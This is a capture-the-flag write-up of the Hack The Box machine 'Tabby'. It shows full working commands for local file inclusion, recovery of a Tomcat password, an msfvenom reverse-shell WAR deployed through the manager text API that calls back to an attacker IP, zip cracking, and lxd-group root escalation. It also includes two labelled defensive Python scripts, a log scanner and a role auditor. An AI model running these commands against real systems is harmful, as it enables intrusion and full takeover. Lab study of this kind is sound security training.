Disclaimers
The host attacked in this article is legally authorized for testing. The tools and methods used in this article are limited to learning and communication. Please do not use the tools and ideas in this article for any illegal purpose. I will not bear any responsibility for any consequences, nor for any misuse or damage.
Service detection
View open ports
┌──(root💀kali)-[~/htb/Tabby]
└─# nmap -p- 10.10.10.194 --open
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 04:22 EST
Nmap scan report for 10.10.10.194
Host is up (0.25s latency).
Not shown: 64733 closed ports, 799 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 249.82 seconds
Port details
┌──(root💀kali)-[~/htb/Tabby]
└─# nmap -sV -T4 -A -O 10.10.10.194 -p 22,80,8080
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 04:33 EST
Nmap scan report for 10.10.10.194
Host is up (0.29s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
|   256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_  256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp   open  http       Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http       Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   292.67 ms 10.10.14.1
2   293.43 ms 10.10.10.194

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.08 seconds
There are two HTTP services: port 80 is Apache and port 8080 is Tomcat.
Port 80
Opening port 80 in a browser, the NEWS link navigates to http://megahosting.htb/news.php?file=statement
Add megahosting.htb to the local hosts file:
echo "10.10.10.194 megahosting.htb" >> /etc/hosts
The NEWS page displays:
We apologise to all our customers for the previous data breach.
We have changed the site to remove this tool, and have invested heavily in more secure servers
So there has been a data breach?
Notice that the file parameter in the URL appears to be a file name. Enter http://megahosting.htb/news.php?file=../../../../../etc/passwd
The target's /etc/passwd is echoed back successfully, proving that LFI exists:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash
There is an ordinary user, ash.
The page returns nothing for files that do not exist or that it has no permission to read.
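Added defender-side example, not from the original write-up: a Python scanner that pulls news.php requests out of an Apache access log and flags traversal in the file parameter, including single- and double-percent-encoded forms. The log lines are constructed; the script and parameter names are taken from the URL above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines (not from the write-up); the last two
# carry the same kind of traversal single- and double-percent-encoded.
SAMPLE_LOG = """\
10.10.14.5 - - [30/Dec/2021:04:40:01 -0500] "GET /news.php?file=statement HTTP/1.1" 200 1780 "-" "Mozilla/5.0"
10.10.14.5 - - [30/Dec/2021:04:41:12 -0500] "GET /news.php?file=../../../../../etc/passwd HTTP/1.1" 200 2350 "-" "Mozilla/5.0"
10.10.14.5 - - [30/Dec/2021:04:42:30 -0500] "GET /news.php?file=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 0 "-" "curl/7.74.0"
10.10.14.5 - - [30/Dec/2021:04:43:05 -0500] "GET /news.php?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 0 "-" "curl/7.74.0"
10.10.14.5 - - [30/Dec/2021:04:44:00 -0500] "GET /logo.png HTTP/1.1" 200 2894 "-" "Mozilla/5.0"
"""
# Enough of the combined format to pull out client, timestamp, request target and status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')  # '..' as a whole path component

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so %2e%2e%2f and %252e%252e%252f both surface as '..'."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify_file_param(value):
    """Return why the value looks like an LFI attempt, or None for a plain name such as 'statement'."""
    decoded = fully_decode(value)
    if TRAVERSAL_RE.search(decoded):
        return "path traversal"
    if decoded.startswith("/"):
        return "absolute path"
    return None

def scan_access_log(log_text, script="/news.php", param="file"):
    """Flag traversal in `param` on every request to `script`, ignoring status and body size:
    the page answers 200 with an empty body for unreadable files, so the response is no signal."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        url = urlsplit(m["target"]) if m else None
        if not url or url.path != script:
            continue
        # parse_qs strips one layer of percent-encoding; fully_decode handles any extra layers.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify_file_param(value)
            if reason:
                hits.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                             "file": fully_decode(value), "reason": reason})
    return hits

if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG):
        print(f'{h["time"]} {h["ip"]} {h["reason"]}: {h["file"]} (HTTP {h["status"]})')
```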
Port 8080
The default Tomcat page on port 8080 exposes some information. Maybe it can be combined with the LFI on port 80.
It works !

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

You might consider installing the following packages, if you haven't already done so:

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

NOTE: For security reasons, using the manager webapp is restricted to users with role "manager-gui". The host-manager webapp is restricted to users with role "admin-gui". Users are defined in /etc/tomcat9/tomcat-users.xml.
Exposed web root path: /var/lib/tomcat9/webapps/ROOT/
http://10.10.10.194:8080/docs/ shows the Tomcat version: 9.0.31
The management users are defined in /etc/tomcat9/tomcat-users.xml, but the LFI cannot display that file.
The same version of Tomcat is installed on the local machine to see where its files live.
View directory structure
┌──(root💀kali)-[/var/lib/tomcat9]
└─# ls
bin  BUILDING.txt  conf  CONTRIBUTING.md  lib  LICENSE  logs  NOTICE  README.md  RELEASE-NOTES  RUNNING.txt  temp  webapps  work
conf
┌──(root💀kali)-[/var/lib/tomcat9/conf]
└─# ls
catalina.policy  catalina.properties  context.xml  jaspic-providers.xml  jaspic-providers.xsd  logging.properties  server.xml  tomcat-users.xml  tomcat-users.xsd  web.xml
The conf folder should be at the same level as webapps, but it cannot be echoed in the browser...
Checking the local tomcat9, it seems there are no files in conf with read permission for ordinary users.
curl
Following the forum hints, it should be installed directly with apt install tomcat9.
Find the tomcat-users.xml location
┌──(root💀kali)-[~/htb/Tabby]
└─# find / -name tomcat-users.xml
/etc/tomcat9/tomcat-users.xml
/usr/share/tomcat9/etc/tomcat-users.xml
/etc/tomcat9/tomcat-users.xml is not readable by ordinary users:
┌──(root💀kali)-[~/htb/Tabby]
└─# ls -alh /etc/tomcat9/tomcat-users.xml
-rw-r----- 1 root tomcat 2.7K 11 October 3:15 /etc/tomcat9/tomcat-users.xml
But /usr/share/tomcat9/etc/tomcat-users.xml is readable by ordinary users:
┌──(root💀kali)-[~/htb/Tabby]
└─# ls -alh /usr/share/tomcat9/etc/tomcat-users.xml
-rw-r--r-- 1 root root 2.7K 11 October 3:15 /usr/share/tomcat9/etc/tomcat-users.xml
Opening the payload http://10.10.10.194/news.php?file=../../../../../usr/share/tomcat9/etc/tomcat-users.xml in a browser, you need to view the page source to see the configuration.
But curl echoes it immediately:
curl -X GET -H 'Content-type:text/xml' http://10.10.10.194/news.php?file=../../../../../usr/share/tomcat9/etc/tomcat-users.xml
tomcat-users.xml contents:
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>
This gives a Tomcat management account: tomcat:$3cureP4s5w0rd123!
However, this account only has admin-gui and manager-script, not manager-gui, so we cannot open the manager web page and use the usual exploit there.
However, it was later found that curl can access the manager's text interface with this account:
┌──(root💀kali)-[~/htb/Tabby]
└─# curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/list
OK - Listed applications for virtual host [localhost]
/:running:0:ROOT
/examples:running:0:/usr/share/tomcat9-examples/examples
/host-manager:running:2:/usr/share/tomcat9-admin/host-manager
/manager:running:0:/usr/share/tomcat9-admin/manager
/docs:running:0:/usr/share/tomcat9-docs/docs
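Added audit example, not from the write-up and not Tomcat's own code: a Python check of tomcat-users.xml that reports which manager interfaces each user's roles open (so a manager-script holder shows up as able to use /manager/text and deploy even without manager-gui), plus a check for the world-readable file mode seen on the /usr/share/tomcat9/etc copy. The sample XML is constructed with the same roles as the file above and a placeholder password; the role-to-interface mapping follows the Tomcat 9 manager documentation.

```python
import stat
import xml.etree.ElementTree as ET

# Which tomcat-users.xml role unlocks which manager interface (Tomcat 9 manager docs).
INTERFACES = {
    "manager HTML (/manager/html)": "manager-gui",
    "manager text (/manager/text)": "manager-script",
    "manager JMX proxy (/manager/jmxproxy)": "manager-jmx",
    "host-manager HTML (/host-manager/html)": "admin-gui",
    "host-manager text (/host-manager/text)": "admin-script",
}
DEPLOY_ROLES = {"manager-gui", "manager-script"}  # either one can deploy a WAR

# Constructed sample with the same roles as the recovered file; the password is a placeholder.
SAMPLE_XML = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="PLACEHOLDER" roles="admin-gui,manager-script"/>
</tomcat-users>
"""

def _local(tag):
    """Strip the namespace so the audit works with and without the xmlns attribute."""
    return tag.rsplit("}", 1)[-1]

def audit_users(xml_text):
    """Map each user to its roles, the interfaces those roles open, and whether it can deploy."""
    report = {}
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        roles = {r.strip() for r in (el.get("roles") or "").split(",") if r.strip()}
        report[el.get("username") or el.get("name")] = {
            "roles": roles,
            "reachable": [iface for iface, role in INTERFACES.items() if role in roles],
            "can_deploy": bool(roles & DEPLOY_ROLES),
        }
    return report

def world_readable(mode):
    """True when the 'other' read bit is set, as on the 0644 copy under /usr/share/tomcat9/etc."""
    return bool(mode & stat.S_IROTH)

if __name__ == "__main__":
    for user, info in audit_users(SAMPLE_XML).items():
        print(user, sorted(info["roles"]), "can deploy:", info["can_deploy"])
        for iface in info["reachable"]:
            print("  reachable:", iface)
```

To audit a live file, pass `open(path).read()` to `audit_users` and `os.stat(path).st_mode` to `world_readable`.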
Following the method in hacktricks:
Build a reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.3 LPORT=4242 -f war -o revshell.war
Upload the reverse shell
┌──(root💀kali)-[~/htb/Tabby]
└─# curl --upload-file revshell.war -u 'tomcat:$3cureP4s5w0rd123!' "http://10.10.10.194:8080/manager/text/deploy?path=/revshell"
OK - Deployed application at context path [/revshell]
Browser open: http://10.10.10.194:8080/revshell/
Catch the reverse shell
┌──(root💀kali)-[~/htb/Tabby]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.194] 50070
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
User
Find an encrypted zip file, 16162020_backup.zip, in /var/www/html/files
After downloading it locally, use zip2john to convert it to a format that John can recognize:
┌──(root💀kali)-[~/htb/Tabby]
└─# /usr/sbin/zip2john 16162020_backup.zip >zip.hash
16162020_backup.zip/var/www/html/assets/ is not encrypted!
ver 1.0 16162020_backup.zip/var/www/html/assets/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/favicon.ico PKZIP Encr: 2b chk, TS_chk, cmplen=338, decmplen=766, crc=282B6DE2
ver 1.0 16162020_backup.zip/var/www/html/files/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/index.php PKZIP Encr: 2b chk, TS_chk, cmplen=3255, decmplen=14793, crc=285CC4D6
ver 1.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/logo.png PKZIP Encr: 2b chk, TS_chk, cmplen=2906, decmplen=2894, crc=2F9F45F
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/news.php PKZIP Encr: 2b chk, TS_chk, cmplen=114, decmplen=123, crc=5C67F19E
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/Readme.txt PKZIP Encr: 2b chk, TS_chk, cmplen=805, decmplen=1574, crc=32DB9CE3
NOTE: It is assumed that all files in each archive have the same password. If that is not the case, the hash may be uncrackable. To avoid this, use option -o to pick a file at a time.
Crack it to get the password
┌──(root💀kali)-[~/htb/Tabby]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it         (16162020_backup.zip)
1g 0:00:00:01 DONE (2021-12-31 03:15) 0.7246g/s 7509Kp/s 7509Kc/s 7509KC/s adnc153..adenabuck
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Extract the zip
┌──(root💀kali)-[~/htb/Tabby]
└─# unzip 16162020_backup.zip
Archive:  16162020_backup.zip
[16162020_backup.zip] var/www/html/favicon.ico password:
  inflating: var/www/html/favicon.ico
   creating: var/www/html/files/
  inflating: var/www/html/index.php
 extracting: var/www/html/logo.png
  inflating: var/www/html/news.php
  inflating: var/www/html/Readme.txt
However, I didn't find any useful files, so I tried logging in to the ash account with the cracked password:
tomcat@tabby:~$ su ash
Password: admin@it
ash@tabby:/opt/tomcat$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
ash@tabby:/opt/tomcat$ whoami
ash
Success.
Root
Checking the group information, the ash account is in the lxd group:
ash@tabby:/var/lib/tomcat9$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
Following privilege escalation Method 2 from hacktricks.
On the Kali side:
Clone the repository locally
git clone https://github.com/saghul/lxd-alpine-builder
Build:
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
The attacker starts an HTTP server with Python and transfers the built image to the target:
wget http://10.10.16.3:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
On the target, import the image and initialize lxd. Note: this does not work in the /tmp directory, only in /home/ash/
ash@tabby:~$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
ash@tabby:~$ lxd init
Accept all the defaults.
Escalate to root
ash@tabby:~$ lxc init myimage mycontainer -c security.privileged=true
Creating mycontainer
ash@tabby:~$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to mycontainer
ash@tabby:~$ lxc start mycontainer
ash@tabby:~$ lxc exec mycontainer /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # whoami
root
Find root.txt
~ # find / -name root.txt
/mnt/root/root/root.txt
Summary
Foothold is the most difficult part. If you don't understand the Tomcat configuration, you can't get the initial shell without probing with curl. hacktricks is really our good friend! When you have no ideas, always go and look at it.
User is simple.
When escalating to root, an error was always reported in the /tmp directory at first, saying that the path of the image file could not be found. Later I thought these paths in docker might be strange.
The attempt to load from the home directory of the lxd administrator ash was successful.